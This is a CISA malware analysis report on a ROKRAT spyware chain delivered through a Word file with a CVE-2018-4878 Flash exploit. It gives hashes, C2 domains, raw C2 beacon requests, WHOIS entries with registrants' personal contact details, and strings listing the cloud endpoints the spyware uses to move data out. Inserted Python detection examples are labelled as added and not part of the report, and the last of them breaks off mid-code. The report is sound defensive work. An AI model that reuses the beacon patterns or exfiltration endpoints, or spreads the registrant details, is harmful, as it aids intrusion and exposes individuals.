Submitted URL: https://www.us-cert.gov/ncas/analysis-reports/ar20-133d
Effective URL: https://www.cisa.gov/news-events/analysis-reports/ar20-133d
Analysis Report


MAR-10160323-1.V2

Last Revised
May 12, 2020
Alert Code
AR20-133D



NOTIFICATION

This report is provided "as is" for informational purposes only. The Department
of Homeland Security (DHS) does not provide any warranties of any kind regarding
any information contained herein. The DHS does not endorse any commercial
product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use
TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in
accordance with applicable rules and procedures for public release. Subject to
standard copyright rules, TLP:WHITE information may be distributed without
restriction. For more information on the Traffic Light Protocol (TLP), see
http://www.us-cert.gov/tlp.


SUMMARY

DESCRIPTION

The CISA Code & Media Analysis team received three artifacts for analysis. The
first artifact is a malicious Microsoft Word document that contains an embedded
Shockwave Flash (SWF) application file. This embedded SWF file attempts to
exploit the vulnerability detailed within CVE-2018-4878. The second artifact
executes an embedded resource named “JOK” and injects it into the Windows
application “Wscript.exe.” This embedded resource contains an encoded variant of
the malware known as ROKRAT. The third artifact in this report is the embedded
ROKRAT variant, which was extracted from the loader during analysis.

For a downloadable copy of IOCs, see MAR-10160323-1.v2.stix.

SUBMITTED FILES (5)

3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c (3f98c434d7b39de61a8b459180dd46...)
851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a (aa525af1589156fc09f78e69b3b034...)
e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd (d2881e56e66aeaebef7efaa60a58ef...)
e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573 (5c6c1ed910e7c9740a0289a6d27890...)
fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0 (111d205422fe90848c2f41cc84ebd9...)

DOMAINS (2)

www.1588-2040.co.kr

www.korea-tax.info


FINDINGS

3B1395F620E428C5F68C6497A2338DA0C4F749FEB64E8F12E4C5B1288CC57A1C

TAGS

CVE-2018-4878, trojan

DETAILS

Name: 3f98c434d7b39de61a8b459180dd46a3
Size: 121344 bytes
Type: Composite Document File V2 Document, Cannot read section info
MD5: 3f98c434d7b39de61a8b459180dd46a3
SHA1: 1584b3ce64835a3c7b796139fbd981a9f2cddb6c
SHA256: 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c
SHA512: 27643afc00fda2dd8b447af1e6950d65fe5b4dd91a8eb022fef68694126efe41fd8895a6c065c261507bb526668c27f4bc055ac58c592d43cf760c32e365be2d
ssdeep: 1536:+dVr1FoOLJEd4EQA9mVOkxN7ORzh9n98scLzA4QfwnEOCnnvlQXRhuA+0qwvxH9n:u1FLNEfBj2NSRvZQnEDtShuA3H9yW
Entropy: 7.947501

ANTIVIRUS

Ahnlab: SWF/Agent
Antiy: Trojan[Exploit]/SWF.CVE-2018-4878
Avira: EXP/CVE-2018-4878.A.Gen
BitDefender: Exploit.Agent.MS
ClamAV: Swf.Trojan.Rokrat-6443186-0
Cyren: Siwifi
ESET: SWF/Exploit.CVE-2018-4878.A trojan
Emsisoft: Exploit.Agent.MS (B)
Ikarus: Trojan.SWF.Exploit
McAfee: RDN/Generic Exploit.lv
Microsoft Security Essentials: Exploit:SWF/Korpode.A
NetGate: Exploit.Win32.Generic
Quick Heal: Exp.OLE.CVE-2018-4878.C
Sophos: Troj/SwfExp-OI
Symantec: Trojan.Gen.NPE.2
TACHYON: Trojan-Exploit/W97.Agent.Gen
TrendMicro: TROJ_EX.F2A7C559
TrendMicro House Call: TROJ_EX.F2A7C559

YARA RULES

No matches found.

SSDEEP MATCHES

97 6280a646ded60de151e1c8ad25f7756e2254f6cb5a7720e704589d692898f8e1
97 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
97 e3247251d459a89493a1494052ad11d8f8c2fd911acd7eedd5bfd78b6bd34c87

RELATIONSHIPS

3b1395f620... Contains 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a

DESCRIPTION

This file is a malicious Microsoft Word document. This document contains an
embedded malicious ShockWave Flash (SWF) file (851b7b04cc) designed to exploit
the vulnerability detailed within CVE-2018-4878.

851B7B044CBCAA67350AFF80A5B9FB4C63393957F3D4B30005A83348FE69AC5A

TAGS

CVE-2018-4878, trojan

DETAILS

Name: aa525af1589156fc09f78e69b3b03428
Size: 117864 bytes
Type: Macromedia Flash data, version 32
MD5: aa525af1589156fc09f78e69b3b03428
SHA1: 6ff889358923ab2a0de80303be9ac559a555b9b9
SHA256: 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
SHA512: 3a82f830bcf547c94a3b0e56ffa27330328b392a4d1356f7e62a28c18d2eb110507968a3f66e51e985ffceb3640885e5402623cf9ab987ae7a005cff2b1edd57
ssdeep: 1536:4dVr1FoOLJEd4EQA9mVOkxN7ORzh9n98scLzA4QfwnEOCnnvlQXRhuA+0qwvxH9S:41FLNEfBj2NSRvZQnEDtShuA3H9yf
Entropy: 7.987027

ANTIVIRUS

Ahnlab: SWF/Cve-2018-4878.R.SS18
Avira: EXP/CVE-2018-4878.A.Gen
BitDefender: Exploit.Agent.MS
ClamAV: Win.Trojan.Agent-6551186-0
Cyren: SWF/CVE-2018-4878.B!Camelot
ESET: SWF/Exploit.CVE-2018-4878.A trojan
Emsisoft: Exploit.Agent.MS (B)
Ikarus: Trojan.SWF.Exploit
McAfee: Exploit-CVE2018-4878.b
Microsoft Security Essentials: Exploit:SWF/Korpode.A!gen
Quick Heal: Exp.SWF.CVE-2018-4878.D
Sophos: Troj/SwfExp-OK
Symantec: Trojan.Gen.NPE.2
TACHYON: Trojan-Exploit/SWF.Agent.Gen

YARA RULES

No matches found.

SSDEEP MATCHES

97 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c
99 6280a646ded60de151e1c8ad25f7756e2254f6cb5a7720e704589d692898f8e1
97 e3247251d459a89493a1494052ad11d8f8c2fd911acd7eedd5bfd78b6bd34c87

RELATIONSHIPS

851b7b044c... Contained_Within 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c
851b7b044c... Connected_To www.korea-tax.info

DESCRIPTION

This file is the malicious ShockWave Flash (SWF) file embedded in the Microsoft
Word document 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c.
When the malware is executed, it attempts to connect to the hard-coded Command
and Control (C2) server "www.korea-tax.info."

WWW.KOREA-TAX.INFO

TAGS

command-and-control

URLS

 * www.korea-tax.info/crossdomain.xml
 * www.korea-tax.info/main/local.php?id=8B4D963B41003E407AC0022E40FCE01C1DA94EB8DEEF20939722ABBFE7F52B9C7DEA62EFDB0D82345AE24D366F9C7BDC2C8F5C460AE8BE18E59C1116489EC9F2EB5504617A4D6D74982D602624E94F32BB3864277E4967BD15B1E36AF4A98431DC76C4BB&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207

PORTS

 * 80 TCP

HTTP SESSIONS

 * GET /crossdomain.xml HTTP/1.1
   Host: www.korea-tax.info
   Connection: keep-alive
   User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
   Accept: */*
   Accept-Encoding: gzip,deflate,sdch
   Accept-Language: en-US,en;q=0.8
 * GET /main/local.php?id=8B4D963B41003E407AC0022E40FCE01C1DA94EB8DEEF20939722ABBFE7F52B9C7DEA62EFDB0D82345AE24D366F9C7BDC2C8F5C460AE8BE18E59C1116489EC9F2EB5504617A4D6D74982D602624E94F32BB3864277E4967BD15B1E36AF4A98431DC76C4BB&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207 HTTP/1.1
   Host: www.korea-tax.info
   Connection: keep-alive
   User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
   Accept: */*
   Accept-Encoding: gzip,deflate,sdch
   Accept-Language: en-US,en;q=0.8

WHOIS

Queried whois.afilias.info with "korea-tax.info"...

Domain Name: KOREA-TAX.INFO
Registry Domain ID: D503300000055962553-LRMS
Registrar WHOIS Server:
Registrar URL: http://www.PublicDomainRegistry.com
Updated Date: 2018-02-10T20:31:57Z
Creation Date: 2017-12-12T05:52:58Z
Registry Expiry Date: 2018-12-12T05:52:58Z
Registrar Registration Expiration Date:
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrar IANA ID: 303
Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com
Registrar Abuse Contact Phone: +1.2013775952
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: C213778924-LRMS
Registrant Name: yang jieun
Registrant Organization: yang jieun
Registrant Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do
Registrant City: Kwangmyong
Registrant State/Province: Kyonggi-do
Registrant Postal Code: 14200
Registrant Country: KR
Registrant Phone: +82.1044612320
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: john.chapman91128@gmail.com
Registry Admin ID: C213778924-LRMS
Admin Name: yang jieun
Admin Organization: yang jieun
Admin Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do
Admin City: Kwangmyong
Admin State/Province: Kyonggi-do
Admin Postal Code: 14200
Admin Country: KR
Admin Phone: +82.1044612320
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: john.chapman91128@gmail.com
Registry Tech ID: C213778924-LRMS
Tech Name: yang jieun
Tech Organization: yang jieun
Tech Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do
Tech City: Kwangmyong
Tech State/Province: Kyonggi-do
Tech Postal Code: 14200
Tech Country: KR
Tech Phone: +82.1044612320
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: john.chapman91128@gmail.com
Registry Billing ID: C213778924-LRMS
Billing Name: yang jieun
Billing Organization: yang jieun
Billing Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do
Billing City: Kwangmyong
Billing State/Province: Kyonggi-do
Billing Postal Code: 14200
Billing Country: KR
Billing Phone: +82.1044612320
Billing Phone Ext:
Billing Fax:
Billing Fax Ext:
Billing Email: john.chapman91128@gmail.com
Name Server: NS3.HOSTINGER.COM
Name Server: NS4.HOSTINGER.COM
Name Server: NS1.HOSTINGER.COM
Name Server: NS2.HOSTINGER.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/

RELATIONSHIPS

www.korea-tax.info Connected_From
851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a

DESCRIPTION

Identified malicious C2 Server.

FEC71B8479F3A416FA58580AE76A8C731C2294C24663C601A1267E0E5C2678A0

TAGS

CVE-2018-4878, trojan

DETAILS

Name: 111d205422fe90848c2f41cc84ebd96a
Size: 117338 bytes
Type: Macromedia Flash data, version 32
MD5: 111d205422fe90848c2f41cc84ebd96a
SHA1: b03f6f336c07d514edb15d6e3fefd98432cae7e2
SHA256: fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0
SHA512: a8e7db77fd6f27ae8ca18be8ed644df3443d17b048fc6baf1b7496da2810b014e19a35e9502de252ad65cf4feb07ccba53aeb567ad62d897231c1a3b17d619b5
ssdeep: 3072:BebZ1dssmUo7VUthHkNEVVKJ6ydYBpb2N4r1Je:sbZfssAGoQymsgM
Entropy: 7.983610

ANTIVIRUS

Ahnlab: SWF/Cve-2018-4878.R.SS18
Antiy: Trojan[Exploit]/SWF.CVE-2018-4878
Avira: EXP/CVE-2018-4878.A.Gen
BitDefender: Script.SWF.C589
ClamAV: Swf.Trojan.Rokrat-6443186-0
Cyren: SWF/CVE-2018-4878.B!Camelot
ESET: SWF/Exploit.CVE-2018-4878.A trojan
Emsisoft: Script.SWF.C589 (B)
Ikarus: Trojan.SWF.Exploit
McAfee: Exploit-CVE2018-4878.b
Microsoft Security Essentials: Exploit:SWF/Korpode.A!gen
NANOAV: Exploit.Swf.CVE20184878.exmycd
Quick Heal: Exp.SWF.CVE-2018-4878.D
Sophos: Troj/SWFExp-OL
Symantec: Trojan.Gen.2
TACHYON: Trojan-Exploit/SWF.Agent.Gen
TrendMicro: SWF_EXP.3A46FD51
TrendMicro House Call: SWF_EXP.3A46FD51

YARA RULES

No matches found.

SSDEEP MATCHES

99 3004196da6055c6f062c94a9aae8dc357fa19b953b071049083e69e840083cf9

RELATIONSHIPS

fec71b8479... Connected_To www.1588-2040.co.kr

DESCRIPTION

This file is a malicious ShockWave Flash (SWF) file designed to exploit the
vulnerability detailed within CVE-2018-4878. When executed, the malware attempts
to connect to the hard-coded command-and-control (C2) server
"www.1588-2040.co.kr."

WWW.1588-2040.CO.KR

TAGS

command-and-control

URLS

 * www.1588-2040.co.kr/crossdomain.xml
 * www.1588-2040.co.kr/design/m/images/image/image.php?id=2E4B4EE62772DB77094E0210546BEEBF2F669A2309009324807100E182FFDFEAB2CE91B00DFA993ACDE3A1198DC8BD9DAF98F449FB04FD8588D94693E08D3BC45F17C4ECDC040F138CC8916D2252478D3BE342D5FA1F6231EF6562053E5C1463FDCEEE82&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207

PORTS

 * 80 TCP

HTTP SESSIONS

 * GET /crossdomain.xml HTTP/1.1
   Host: www.1588-2040.co.kr
   Connection: keep-alive
   User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
   Accept: */*
   Accept-Encoding: gzip,deflate,sdch
   Accept-Language: en-US,en;q=0.8
 * GET /design/m/images/image/image.php?id=2E4B4EE62772DB77094E0210546BEEBF2F669A2309009324807100E182FFDFEAB2CE91B00DFA993ACDE3A1198DC8BD9DAF98F449FB04FD8588D94693E08D3BC45F17C4ECDC040F138CC8916D2252478D3BE342D5FA1F6231EF6562053E5C1463FDCEEE82&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207 HTTP/1.1
   Host: www.1588-2040.co.kr
   Connection: keep-alive
   User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
   Accept: */*
   Accept-Encoding: gzip,deflate,sdch
   Accept-Language: en-US,en;q=0.8
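Both C2 sessions in this report (www.korea-tax.info above and www.1588-2040.co.kr here) share one check-in shape: a fetch of /crossdomain.xml, then a GET whose query carries a long hexadecimal id plus fp_vs (Flash Player build) and os_vs parameters. The Python below is an added example, not part of the CISA report: it scans constructed, tab-separated proxy-log lines for that shape and for the two C2 hosts the report names. The log format, client addresses and id values are constructed; the affected-build bound for CVE-2018-4878 is taken from Adobe's advisory, not from this report.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# C2 hosts named in the report.
KNOWN_C2_HOSTS = {"www.korea-tax.info", "www.1588-2040.co.kr"}
# Newest Flash Player build affected by CVE-2018-4878 (Adobe advisory; assumption, not from this report).
LAST_VULNERABLE_FLASH = (28, 0, 0, 137)
# In both sessions the id= value is a long run of hex digits.
HEX_ID = re.compile(r"^[0-9A-Fa-f]{64,}$")
UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36")

# Constructed proxy-log lines: "<client>\t<method>\t<url>\t<user-agent>".
# Client addresses and id values are made up; hosts and URL shapes follow the report.
SAMPLE_LOG = [
    "10.0.0.5\tGET\thttp://www.korea-tax.info/crossdomain.xml\t" + UA,
    "10.0.0.5\tGET\thttp://www.korea-tax.info/main/local.php?id=" + "A1B2C3D4" * 10
    + "&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207\t" + UA,
    # crossdomain.xml on its own is ordinary Flash behaviour and must not alert
    "10.0.0.7\tGET\thttp://www.example.com/crossdomain.xml\t" + UA,
    # same query shape on an unknown host, but from a Flash build newer than the bound
    "10.0.0.9\tGET\thttp://cdn.example.net/assets.php?id=" + "F0E1" * 20
    + "&fp_vs=WIN%2029.0,0,113&os_vs=Windows%2010\t" + UA,
]


def parse_flash_version(fp_vs):
    """'WIN 18.0,0,209' -> (18, 0, 0, 209); None when the value is not that shape."""
    m = re.match(r"^[A-Z]+\s+(\d+)\.(\d+),(\d+),(\d+)$", fp_vs)
    return tuple(int(x) for x in m.groups()) if m else None


def is_beacon_query(query):
    """True when the query has the check-in shape: a long hex id plus fp_vs and os_vs."""
    q = parse_qs(query)
    if not all(k in q for k in ("id", "fp_vs", "os_vs")):
        return False
    return bool(HEX_ID.match(q["id"][0]))


def analyze_proxy_log(lines):
    """One finding per (client, host) pair that shows a known C2 host, the beacon
    query shape, crossdomain.xml before the beacon, or a vulnerable Flash build."""
    state = defaultdict(lambda: {"crossdomain": False, "beacon": False,
                                 "ordered": False, "flash": None})
    for line in lines:
        client, method, url, _ua = line.split("\t", 3)
        parts = urlsplit(url)
        s = state[(client, parts.hostname or "")]
        if method != "GET":
            continue
        if parts.path == "/crossdomain.xml":
            s["crossdomain"] = True
        elif is_beacon_query(parts.query):
            s["beacon"] = True
            s["ordered"] = s["ordered"] or s["crossdomain"]  # crossdomain.xml came first
            s["flash"] = parse_flash_version(parse_qs(parts.query)["fp_vs"][0])
    findings = []
    for (client, host), s in state.items():
        reasons = []
        if host in KNOWN_C2_HOSTS:
            reasons.append("known_c2_host")
        if s["beacon"]:
            reasons.append("exploit_beacon_query")
        if s["ordered"]:
            reasons.append("crossdomain_then_beacon")
        if s["flash"] and s["flash"] <= LAST_VULNERABLE_FLASH:
            reasons.append("vulnerable_flash_version")
        if reasons:
            findings.append({"client": client, "host": host, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in analyze_proxy_log(SAMPLE_LOG):
        print(finding)
```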

WHOIS

Domain Name                 : 1588-2040.co.kr
Registrant                  : S.S. Moon
Registrant Address          : 1303 manhatan b/d 36-2, Yeoeuido-dong Yeongdeungpo-gu Seoul Korea
Registrant Zip Code         : 150749
Administrative Contact(AC)  : S.S. Moon
AC E-Mail                   : card15882040@nate.com
AC Phone Number             : 02-2090-3500
Registered Date             : 2009. 07. 03.
Last Updated Date           : 2015. 07. 03.
Expiration Date             : 2018. 07. 03.
Publishes                   : Y
Authorized Agency           : Asadal, Inc.(http://www.asadal.co.kr)
DNSSEC                      : unsigned

Primary Name Server
Host Name                   : ns.epart.com

Secondary Name Server
Host Name                   : ns1.epart.com

RELATIONSHIPS

www.1588-2040.co.kr Connected_From
fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0

DESCRIPTION

Identified malicious C2 domain.

E1546323DC746ED2F7A5C973DCECC79B014B68BDD8A6230239283B4F775F4BBD

TAGS

backdoor, dropper, trojan

DETAILS

Name: d2881e56e66aeaebef7efaa60a58ef9b
Size: 626688 bytes
Type: PE32 executable (GUI) Intel 80386, for MS Windows
MD5: d2881e56e66aeaebef7efaa60a58ef9b
SHA1: c09c1be69e5a206bcfe3d726773f0b0ddecb3622
SHA256: e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd
SHA512: da6e40bcebc6161386142caa6c1e68faf7f520cc48cbb514d8029d65f9bb0cac14bde435eb584a998be9e379cc875b85719cc0d4ee9d0fed73b5c20cf7da7fe8
ssdeep: 12288:cbeQy0+6dUlyAcdqfAkMvGpns9gKYLd+NjhzZkZf7:AfuJGv2ns9XRkZf
Entropy: 7.866467

ANTIVIRUS

Ahnlab: Trojan/Win32.Loader
Antiy: Trojan/Win32.RockRat
Avira: TR/Dropper.Gen
BitDefender: Trojan.GenericKD.41796224
ClamAV: Win.Trojan.Rokrat-6443187-0
Cyren: W32/Trojan.IKOU-3732
ESET: Win32/Spy.Agent.PHF trojan
Emsisoft: Trojan.GenericKD.41796224 (B)
Filseclab: Trojan.RockRat.gen.qzrl
Ikarus: Trojan.Win32.Krypt
K7: Trojan ( 00525b861 )
McAfee: Trojan-FPCM!D2881E56E66A
Microsoft Security Essentials: Trojan:Win32/Korpode.A!dha
NANOAV: Trojan.Win32.RockRat.exmijf
NetGate: Trojan.Win32.Malware
Quick Heal: Trojan.RockRat.S1875120
Sophos: Mal/FakeAV-ST
Symantec: Backdoor.Rokrat
Systweak: trojan.korpode
TrendMicro: Backdoo.3FA9A8A6
TrendMicro House Call: Backdoo.3FA9A8A6
Vir.IT eXplorer: Trojan.Win32.Spy.AST
VirusBlokAda: Malware-Cryptor.Inject.gen

YARA RULES

No matches found.

SSDEEP MATCHES

No matches found.

PACKERS/COMPILERS/CRYPTORS

Microsoft Visual C++ ?.?

RELATIONSHIPS

e1546323dc... Contains
e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573

DESCRIPTION

This file is a loader. It is designed to load and execute data contained within
an embedded resource named "JOK" into the Windows application "Wscript.exe." The
embedded "JOK" resource is approximately 522,848 bytes in size and contains
executable code. The beginning portion of the data reveals the presence of a NOP
sled (0x90, 0x90, 0x90, ...), which leads to a decoder stub. The decoder code
decodes the embedded executable code within the Windows "Wscript.exe" process.
The embedded executable code has been identified as ROKRAT
(e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573).
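To triage a resource extracted from a loader like this one the way the description above does (a run of 0x90 bytes, then the decoder stub, then the encoded payload), here is an added Python example that is not part of the CISA report: it measures the leading NOP run, records where the code after it begins, and computes the Shannon entropy of the remainder, the same bits-per-byte measure the report's Entropy fields use. The sample blob is constructed to mimic the layout only; its NOP count and the placeholder stub bytes are made up.

```python
import math

NOP = 0x90


def shannon_entropy(data):
    """Bits per byte (0.0 to 8.0); this is the measure behind the report's Entropy field."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def leading_nop_sled(data, min_len=16):
    """Length of the run of 0x90 bytes at the start of data, or 0 if the run is
    shorter than min_len. A long run that leads into other code is the
    sled-then-decoder-stub layout the report describes for the JOK resource."""
    i = 0
    while i < len(data) and data[i] == NOP:
        i += 1
    return i if i >= min_len else 0


def triage_resource(data, min_sled=16):
    """Summarise one extracted resource blob: sled length, where the code after
    the sled begins (the decoder stub), and the entropy of everything after it."""
    sled = leading_nop_sled(data, min_sled)
    # A blob that is nothing but NOPs has no stub to point at.
    stub_offset = sled if 0 < sled < len(data) else None
    tail = data[sled:] if stub_offset is not None else data
    ent = shannon_entropy(tail)
    indicators = []
    if sled:
        indicators.append("leading_nop_sled")
    if stub_offset is not None and ent > 7.0:
        # High entropy after the sled is what an encoded payload plus a small decoder looks like.
        indicators.append("encoded_payload_after_sled")
    if data[:2] == b"MZ":
        indicators.append("plain_pe_header")
    return {"size": len(data), "sled_length": sled, "stub_offset": stub_offset,
            "tail_entropy": round(ent, 3), "indicators": indicators}


# Constructed sample: 64 NOPs, three placeholder stub bytes, then a high-entropy payload.
# The real JOK resource is about 522,848 bytes; only the layout is imitated here.
STUB_PLACEHOLDER = b"\x01\x02\x03"
SAMPLE_RESOURCE = bytes([NOP] * 64) + STUB_PLACEHOLDER + bytes(range(256)) * 8

if __name__ == "__main__":
    print(triage_resource(SAMPLE_RESOURCE))
```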

SCREENSHOTS

Figure 1 - (image not reproduced in the text extraction)

E200517AB9482E787A59E60ACCC8552BD0C844687CD0CF8EC4238ED2FC2FA573

TAGS

spyware, trojan

DETAILS

Name: 5c6c1ed910e7c9740a0289a6d278908a
Size: 520704 bytes
Type: PE32 executable (GUI) Intel 80386, for MS Windows
MD5: 5c6c1ed910e7c9740a0289a6d278908a
SHA1: 0e46e026890982da526d8acf9f1ce6287451c9a6
SHA256: e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573
SHA512: e2d3059e28998bfb5c0badf3d6d8df28e527037c33b489b7dcc2f392a1d91a568beef410a4feaabc4daee98112142e58394ed5e2a73c71ed0cb46943eb3383d1
ssdeep: 6144:Wh65XKGJs5Ve5psLyYuwAKdf9Q4p9FCAkko7cmxBZAk4+AJ6P3VNUo+wABK7Cl/5:SAKdf+4p9J2x0k4+AQ3VNH+rZx7Aq9
Entropy: 6.560851

ANTIVIRUS

Ahnlab: Trojan/Win32.Hwdoor
Antiy: Trojan[Spy]/Win32.Agent
Avira: HEUR/AGEN.1133065
BitDefender: Gen:Variant.Graftor.538484
ClamAV: Win.Trojan.Rokrat-6380697-0
ESET: a variant of Win32/Spy.Agent.PHF trojan
Emsisoft: Gen:Variant.Graftor.538484 (B)
Ikarus: Trojan-Spy.Agent
K7: Spyware ( 0051fbf81 )
Microsoft Security Essentials: Trojan:Win32/Korpode.A!dha
NANOAV: Trojan.Win32.Generic.evuabe
NetGate: Trojan.Win32.Malware
Sophos: Troj/Spy-AQO
Symantec: Trojan.Gen.2
Systweak: malware.gen-rg
TACHYON: Trojan-Spy/W32.Agent.520704.E
TrendMicro: TSPY_KO.89D03B8E
TrendMicro House Call: TSPY_KO.89D03B8E
Vir.IT eXplorer: Trojan.Win32.Spy.BUB
VirusBlokAda: TrojanSpy.Agent

YARA RULES

No matches found.

SSDEEP MATCHES

No matches found.

PACKERS/COMPILERS/CRYPTORS

Microsoft Visual C++ ?.?

RELATIONSHIPS

e200517ab9... Contained_Within
e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd

DESCRIPTION

This file has been identified as a variant of the malware known as ROKRAT and
was obtained by extracting it from the file
e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd.



Displayed below are strings of interest extracted from this variant of ROKRAT.



--Begin Strings of Interest--

Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/53.0.2785.116 Safari/537.36

access_token

authorization_code

bearer

client_id

client_secret

code

expires_in

grant_type

redirect_uri

refresh_token

response_type

scope

state

token

token_type

access_token

authorization_code

bearer

client_id

client_secret

code

expires_in

grant_type

redirect_uri

refresh_token

response_type

scope

state

token

token_type

Accept

Accept-Charset

Accept-Encoding

Accept-Language

Accept-Ranges

Age

Allow

Authorization

Cache-Control

Connection

Content-Encoding

Content-Language

Content-Length

Content-Location

Content-MD5

Content-Range

Content-Type

Content-Disposition

Date

ETag

Expect

Expires

From

Host

If-Match

If-Modified-Since

If-None-Match

If-Range

If-Unmodified-Since

Last-Modified

Location

Max-Forwards

Pragma

Proxy-Authenticate

Proxy-Authorization

Range

Referer

Retry-After

Server

Trailer

Transfer-Encoding

Upgrade

User-Agent

Vary

Via

Warning

WWW-Authenticate

Cookie

Set-Cookie

text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

en-US,en;q=0.8

Bearer

http://127.0.0.1/

https://api.box.com/oauth2/token

https://account.box.com/api/oauth2/authorize

https://api.box.com/2.0/folders/%s/items

GET

entries

etag

name

sequence_id

type

folder

file

POST

201

409

DELETE

204

https://api.box.com/2.0/files/%s/content

200

https://api.box.com/2.0/files/%s

https://api.box.com/2.0/files/%s/trash

https://upload.box.com/api/2.0/files/content

--opxer--

Content-Disposition: form-data; name="attributes"

"}}

", "parent":{"id":"

{"name":"

Content-Disposition: form-data; name="file"; filename="

Content-Type: video/dat

multipart/form-data;boundary=--opxer--

error

sha1

description

created_at

modified_at

size

https://api.box.com/2.0/folders/%s

Error

var request_token = '

max-age=0

<input type="hidden" name="ic" value="

<input type="hidden" name="state" value="

<form action="

box_visitor_id=

bv=

cn=

site_preference=

302

vector<T> too long

invalid string position

string too long

Aapplication/json

path

https://api.dropboxapi.com/2/files/delete

https://content.dropboxapi.com/2/files/upload

application/octet-stream

{"path":"%s","mode":{".tag":"overwrite"}}

{"path":"%s"}

Dropbox-API-Arg

https://content.dropboxapi.com/2/files/download

Ahttps://api.pcloud.com/oauth2_token

https://my.pcloud.com/oauth2/authorize

https://api.pcloud.com/uploadfile?path=%s&filename=%s&nopartial=1

--wwjaughalvncjwiajs--

Content-Type: voice/mp3

multipart/form-data;boundary=--wwjaughalvncjwiajs--

fileids

https://api.pcloud.com/getfilelink?path=%s&forcedownload=1&skipfilename=1

hosts

https://%s%s

https://api.pcloud.com/deletefile?path=%s

true

%s/%s

OAuth

PUT

href

https://cloud-api.yandex.net/v1/disk/resources?path=%s&permanently=%s

false

202

https://cloud-api.yandex.net/v1/disk/resources/upload?path=%s&overwrite=%s

method

https://cloud-api.yandex.net/v1/disk/resources/download?path=%s

--End Strings of Interest--
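The strings above show OAuth2 token flows and file upload, download and delete endpoints for Box, Dropbox, pCloud and Yandex Disk, two fixed multipart boundaries (--opxer-- and --wwjaughalvncjwiajs--), unusual part content types (video/dat, voice/mp3) and one fixed Chrome/53 user agent. The Python below is an added example and not part of the CISA report: it maps a strings dump to the cloud endpoints it references, and scores a single HTTP request for those variant-specific markers on top of a cloud-storage endpoint. The request dict shape, the two sample requests and the "ExampleSyncClient" user agent are constructed.

```python
from urllib.parse import urlsplit

# Cloud-storage endpoints recovered from the strings above, as
# (provider, role, host, path prefix). Longer prefixes are tried first so
# the Yandex upload/download paths win over the bare resources path.
ENDPOINTS = sorted([
    ("box", "token", "api.box.com", "/oauth2/token"),
    ("box", "list", "api.box.com", "/2.0/folders/"),
    ("box", "file", "api.box.com", "/2.0/files/"),
    ("box", "upload", "upload.box.com", "/api/2.0/files/content"),
    ("dropbox", "delete", "api.dropboxapi.com", "/2/files/delete"),
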